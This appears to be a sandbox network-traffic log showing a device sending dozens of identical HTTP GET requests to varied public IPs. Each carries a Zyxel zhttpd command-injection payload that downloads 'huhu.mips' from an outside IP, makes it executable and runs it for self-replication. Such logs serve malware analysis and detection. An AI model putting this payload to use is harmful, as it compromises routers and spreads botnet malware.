                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745580912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5780192.168.2.153621642.169.12.91443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745605946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5781192.168.2.1535788112.29.165.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745651960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5782192.168.2.1537810181.231.217.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745682001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5783192.168.2.155986889.56.46.7443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745732069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5784192.168.2.1559852126.190.205.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745754957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5785192.168.2.1540748112.252.72.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745800972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5786192.168.2.1558870184.39.254.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745830059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5787192.168.2.1554712104.45.185.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745877981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5788192.168.2.1548254187.43.246.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745907068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5789192.168.2.154429666.89.3.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745933056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5790192.168.2.1533522190.38.32.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.745981932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5791192.168.2.1532928191.132.219.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746011972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5792192.168.2.1551698155.186.169.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746052980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5793192.168.2.154093097.107.4.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746088982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5794192.168.2.1550876157.159.224.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746129036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5795192.168.2.1539208160.44.162.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746165991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5796192.168.2.154488686.144.23.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746193886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5797192.168.2.154824479.38.71.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746263027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5798192.168.2.1558408223.51.64.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746267080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5799192.168.2.154251676.122.29.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746308088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5800192.168.2.1547622162.125.22.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746356964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5801192.168.2.15563509.81.140.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746407986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5802192.168.2.1553796221.5.254.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746450901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5803192.168.2.154039459.59.119.154443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746485949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5804192.168.2.154194699.231.59.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746531963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5805192.168.2.155777074.112.65.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746548891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5806192.168.2.1557400126.26.173.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746620893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5807192.168.2.153495689.152.191.138443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746654034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5808192.168.2.1546366184.116.221.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746686935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5809192.168.2.1550346118.82.76.252443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746727943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5810192.168.2.1557488125.154.35.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746773958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5811192.168.2.155171290.159.227.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746814966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5812192.168.2.15563544.100.49.157443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746869087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5813192.168.2.1559188210.220.99.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746918917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5814192.168.2.1558568170.40.70.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746962070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5815192.168.2.154445295.210.82.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.746984959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5816192.168.2.1554254203.8.201.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747018099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5817192.168.2.1542410210.51.53.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747052908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5818192.168.2.155249219.249.97.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747085094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5819192.168.2.1555932118.140.180.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747129917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5820192.168.2.1557484143.118.105.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747148991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5821192.168.2.1544316210.48.237.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747195005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5822192.168.2.154507258.56.98.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747224092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5823192.168.2.155573432.20.163.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747273922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5824192.168.2.1554290133.2.252.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747302055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5825192.168.2.1542870166.73.194.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747328043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5826192.168.2.154076631.91.21.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747380018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5827192.168.2.1544098134.157.159.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747411013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5828192.168.2.155825037.110.57.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747446060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5829192.168.2.1538240179.238.5.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747481108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5830192.168.2.1557618154.76.204.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747523069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5831192.168.2.15433008.67.55.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747555017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5832192.168.2.1541854115.161.122.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747592926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5833192.168.2.1546402223.178.169.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747616053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5834192.168.2.1533700145.95.45.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747720957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5835192.168.2.1538504140.54.234.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747770071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5836192.168.2.1533086158.36.106.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747802973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5837192.168.2.1538202113.248.106.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747848034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5838192.168.2.1551230219.116.146.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747879028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5839192.168.2.154602212.232.89.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747914076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5840192.168.2.155080473.228.45.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.747968912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5841192.168.2.1560820182.141.35.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748018026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5842192.168.2.1537190115.14.96.224443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:18.748040915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5843192.168.2.154574214.188.153.173443
                                            TimestampBytes transferredDirectionData
